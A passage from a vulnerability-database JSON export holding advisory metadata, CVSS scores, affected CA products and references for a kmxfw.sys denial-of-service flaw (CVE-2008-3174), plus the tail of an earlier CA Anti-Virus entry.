"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86925\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/313/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86836"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14435/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo87114"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86923\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86834"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/312/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89141"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10672/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7112/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10673/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "BID",
"id": "25049"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "PACKETSTORM",
"id": "58024"
},
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "PACKETSTORM",
"id": "58032"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "BID",
"id": "25049"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "PACKETSTORM",
"id": "58024"
},
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "PACKETSTORM",
"id": "58032"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-07-26T00:00:00",
"db": "VULHUB",
"id": "VHN-27237"
},
{
"date": "2007-07-24T00:00:00",
"db": "BID",
"id": "25049"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"date": "2007-07-25T04:50:57",
"db": "PACKETSTORM",
"id": "58024"
},
{
"date": "2007-07-25T04:42:29",
"db": "PACKETSTORM",
"id": "58018"
},
{
"date": "2007-07-26T04:26:32",
"db": "PACKETSTORM",
"id": "58032"
},
{
"date": "2007-07-26T00:30:00",
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"date": "2007-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-15T00:00:00",
"db": "VULHUB",
"id": "VHN-27237"
},
{
"date": "2007-07-27T18:05:00",
"db": "BID",
"id": "25049"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"date": "2021-04-14T15:34:35.667000",
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Anti-Virus Such as arclib.dll Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
],
"trust": 0.6
}
}
VAR-200808-0291
Vulnerability from variot - Updated: 2023-12-18 12:12Unspecified vulnerability in the kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, allows remote attackers to cause a denial of service via unknown vectors, related to "insufficient validation.". (DoS) There is a vulnerability that becomes a condition.Service disruption by a third party (DoS) There is a possibility of being put into a state. Computer Associates products are prone to two vulnerabilities. Attackers may exploit the first vulnerability locally to execute arbitrary code with SYSTEM-level privileges or cause a system crash. Attackers may exploit the second vulnerability remotely to cause denial-of-service conditions. Successful attacks will completely compromise the computer or cause denial-of-service conditions. There is an unknown vulnerability in the kmxfw.sys driver in CA HIPS r8.
2) An unspecified error in the kmxfw.sys driver can be exploited to cause a DoS.
PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Tobias Klein 2) Elazar Broad
ORIGINAL ADVISORY: CA: http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. CA has issued updates to address the vulnerabilities. The first vulnerability, CVE-2008-2926, occurs due to insufficient verification of IOCTL requests by the kmxfw.sys driver. The second vulnerability, CVE-2008-3174, occurs due to insufficient validation by the kmxfw.sys driver. An attacker can make a request that can cause a system crash.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a Medium risk rating. CA Personal Firewall Engine 1.2.276 and later are not affected. To ensure that the latest automatic update is installed on your computer, customers can view the Help>About screen in their CA Personal Firewall product and confirm that the engine version number is 1.2.276 or higher. For support information, visit http://shop.ca.com/support.
How to determine if you are affected: 1. Using Windows Explorer, locate the file "kmxfw.sys". By default, the file is located in the "C:\Windows\system32\drivers\" directory. 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file version is less than indicated in the below table, the installation is vulnerable.
File Name Version Size (bytes) Date kmxfw.sys 6.5.5.18 115,216 March 14, 2008
Workaround: None
References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA Host-Based Intrusion Prevention System SDK https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=182496 Solution Document Reference APARs: RO00535 CA Security Response Blog posting: CA Host-Based Intrusion Prevention System SDK kmxfw.sys Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2008/08/12.aspx Reported By: Tobias Klein (CVE-2008-2926) http://www.trapkit.de/ Elazar Broad (CVE-2008-3174) CVE References: CVE-2008-2926 - CA HIPS kmxfw.sys IOCTL http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2926 CVE-2008-3174 - CA HIPS kmxfw.sys denial of service http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3174 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://support.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj4DBQFIoduueSWR3+KUGYURAmmKAJ9FWl5gIZrbrGhg5CZ0NKzw0QE8qQCY+Qys ekQdlRjiIYnyp9WEqqGAxQ== =ltU4 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200808-0291",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host based intrusion prevention system",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "r8"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "2008"
},
{
"model": "personal firewall",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "2008"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "2007"
},
{
"model": "personal firewall",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "2007"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "r8"
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "personal firewall",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2008"
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2007"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20070"
},
{
"model": "associates host-based intrusion prevention system r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates personal firewall engine",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.2.276"
}
],
"sources": [
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:computer_associates:personal_firewall:2007:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:computer_associates:personal_firewall:2008:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:computer_associates:host_based_intrusion_prevention_system:r8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:computer_associates:internet_security_suite:2007:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:computer_associates:internet_security_suite:2008:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tobias Klein, Elazar Broad",
"sources": [
{
"db": "BID",
"id": "30651"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
],
"trust": 0.9
},
"cve": "CVE-2008-3174",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2008-3174",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-33299",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-3174",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200808-174",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-33299",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, allows remote attackers to cause a denial of service via unknown vectors, related to \"insufficient validation.\". (DoS) There is a vulnerability that becomes a condition.Service disruption by a third party (DoS) There is a possibility of being put into a state. Computer Associates products are prone to two vulnerabilities. \nAttackers may exploit the first vulnerability locally to execute arbitrary code with SYSTEM-level privileges or cause a system crash. Attackers may exploit the second vulnerability remotely to cause denial-of-service conditions. \nSuccessful attacks will completely compromise the computer or cause denial-of-service conditions. There is an unknown vulnerability in the kmxfw.sys driver in CA HIPS r8. \n\n2) An unspecified error in the kmxfw.sys driver can be exploited to\ncause a DoS. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits:\n1) Tobias Klein\n2) Elazar Broad\n\nORIGINAL ADVISORY:\nCA:\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. CA has issued \nupdates to address the vulnerabilities. The first vulnerability, \nCVE-2008-2926, occurs due to insufficient verification of IOCTL \nrequests by the kmxfw.sys driver. The second vulnerability, \nCVE-2008-3174, occurs due to insufficient validation by the \nkmxfw.sys driver. An attacker can make a request that can cause a \nsystem crash. \n\n\nMitigating Factors: None\n\n\nSeverity: CA has given these vulnerabilities a Medium risk rating. CA Personal Firewall Engine 1.2.276 and later are not \naffected. To ensure that the latest automatic update is installed \non your computer, customers can view the Help\u003eAbout screen in \ntheir CA Personal Firewall product and confirm that the engine \nversion number is 1.2.276 or higher. For support information, \nvisit http://shop.ca.com/support. \n\n\nHow to determine if you are affected:\n1. Using Windows Explorer, locate the file \"kmxfw.sys\". By default, \n the file is located in the \"C:\\Windows\\system32\\drivers\\\" directory. \n2. Right click on the file and select Properties. \n3. Select the General tab. \n4. If the file version is less than indicated in the below table, \n the installation is vulnerable. \n\nFile Name Version Size (bytes) Date\nkmxfw.sys 6.5.5.18 115,216 March 14, 2008\n\n\nWorkaround: None\n\n\nReferences (URLs may wrap):\nCA Support:\nhttp://support.ca.com/\nSecurity Notice for\nCA Host-Based Intrusion Prevention System SDK\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=182496\nSolution Document Reference APARs:\nRO00535\nCA Security Response Blog posting:\nCA Host-Based Intrusion Prevention System SDK kmxfw.sys Multiple \n Vulnerabilities\ncommunity.ca.com/blogs/casecurityresponseblog/archive/2008/08/12.aspx\nReported By: \nTobias Klein (CVE-2008-2926)\nhttp://www.trapkit.de/\nElazar Broad (CVE-2008-3174)\nCVE References:\nCVE-2008-2926 - CA HIPS kmxfw.sys IOCTL\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2926\nCVE-2008-3174 - CA HIPS kmxfw.sys denial of service\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3174\nOSVDB References: Pending\nhttp://osvdb.org/\n\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\n\nCustomers who require additional information should contact CA\nTechnical Support at http://support.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to our product security response team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2008 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj4DBQFIoduueSWR3+KUGYURAmmKAJ9FWl5gIZrbrGhg5CZ0NKzw0QE8qQCY+Qys\nekQdlRjiIYnyp9WEqqGAxQ==\n=ltU4\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-3174",
"trust": 2.9
},
{
"db": "BID",
"id": "30651",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "31434",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1020662",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1020661",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1020663",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2008-2339",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251",
"trust": 0.8
},
{
"db": "XF",
"id": "44393",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080812 CA HOST-BASED INTRUSION PREVENTION SYSTEM SDK KMXFW.SYS MULTIPLE VULNERABILITIES",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-33299",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68975",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "69034",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
]
},
"id": "VAR-200808-0291",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-33299"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:12:04.097000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ca.com/us/default.aspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/30651"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1020661"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1020662"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1020663"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/31434"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/495397/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2008/2339"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44393"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3174"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-3174"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/44393"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/495397/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2008/2339"
},
{
"trust": 0.4,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559"
},
{
"trust": 0.3,
"url": "http://www.trapkit.de/advisories/tkadv2008-006.txt"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/495427"
},
{
"trust": 0.3,
"url": "/archive/1/495397"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/18834/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/31434/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12660/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16198/"
},
{
"trust": 0.1,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19549/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.1,
"url": "http://corporate.secunia.com/about_secunia/64/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14434/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/solutionresults?aparno=ro00535\u0026actionid=4"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-2926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3174"
},
{
"trust": 0.1,
"url": "http://www.trapkit.de/"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://shop.ca.com/support."
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2926"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=177782"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/redirarticles?reqpage=search\u0026se"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=182496"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
]
},
"sources_release_date": {
"@context": {
